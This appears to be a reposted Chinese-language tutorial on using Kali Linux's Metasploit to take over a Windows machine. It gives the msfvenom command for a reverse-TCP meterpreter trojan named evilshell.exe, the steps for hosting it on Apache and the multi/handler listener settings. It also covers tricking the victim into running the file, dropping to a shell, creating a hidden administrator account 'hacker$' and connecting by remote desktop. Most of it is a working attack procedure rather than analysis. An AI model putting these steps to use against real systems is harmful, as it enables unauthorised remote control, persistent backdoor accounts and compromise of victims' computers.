使用Kali中的Metasploit生成木馬控制Windows系統


Kali系統基於Debian的數字取證系統,上面集成了很多滲透測試工具,其前身是BT5 R3(BackTrack),其中Metasploit是一個綜合利用工具,極大的提高了攻擊者的滲透效率,使用Ruby開發,使用非常方便,進入工具的方式:msfconsole,MSF依賴於Postgresql數據庫,在使用MSF前要開啟該數據庫
1. 生成木馬,通過msfvenom

msfvenom -p(后加payload) windows/meterpreter/reverse_tcp lhost=kali's ip(攻擊者的ip) lport=5555(端口號) -f exe > ./root/desktop/evilshell.exe

-p 參數后加payload,攻擊成功后要做什么事情
lhost 后跟監聽的ip
lport 后跟監聽的端口
-f 后跟要生成的后門文件的類型

2. 將木馬文件evilshell.exe拷貝到/var/www/html,開啟apache,在肉雞上開啟瀏覽器訪問kali的ip,點擊evilshell.exe將文件保存至windows桌面

 

 

 

 


3. 開啟postgresql(端口5432),/etc/init.d/postgresql start,輸入msfconsole進入msf服務

/etc/init.d/postgresql start
=[ metasploit v5.0.46-dev ]
+ -- --=[ 1921 exploits - 1075 auxiliary - 330 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 4 evasion ]

exploits:開發利用,攻擊某些服務、平台、系統等用到的工具
payload:載荷載體,攻擊成功后要操作什么

4.加載exploits和payloads,查看該模塊需要設置的參數,這里的路徑要和上面生成木馬時的payload一致

msf5>use exploit/multi/handler 選擇exploits
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  設置payload
show options  查看所需設置的參數

輸入命令后會出現所需設置的參數,將lhost與lport設置為與生成木馬時一樣

set lhost kali的IP  設置監聽地址
set lport 5555  設置監聽端口
run 或者exploit  運行攻擊模塊
例:
Msf5>use exploit/multi/handler
Msf5>exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp Msf5>exploit(multi/handler) >show options Msf5>exploit(multi/handler) >set lhost 192.168.217.136 Msf5>exploit(multi/handler) >set lport 5555
 

5.在肉雞中誘導用戶點擊exe程序(社會工程學攻擊),在kali中會得到肉雞的shell(meterpreter)
點擊后在kali中

meterpreter > shell 獲取目標主機的shell
Net user hacker$ root /add 創建新用戶並將該用戶密碼設置為root Net localgroup administrators hacker$ /add 將用戶添加至管理員組中

net user host$ 查看host$用戶信息

在kali中重新開啟一個終端,rdesktop 192.168.217.134 使用遠程桌面連接目標主機(默認端口為3389)如果失敗需要在目標主機上開啟

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM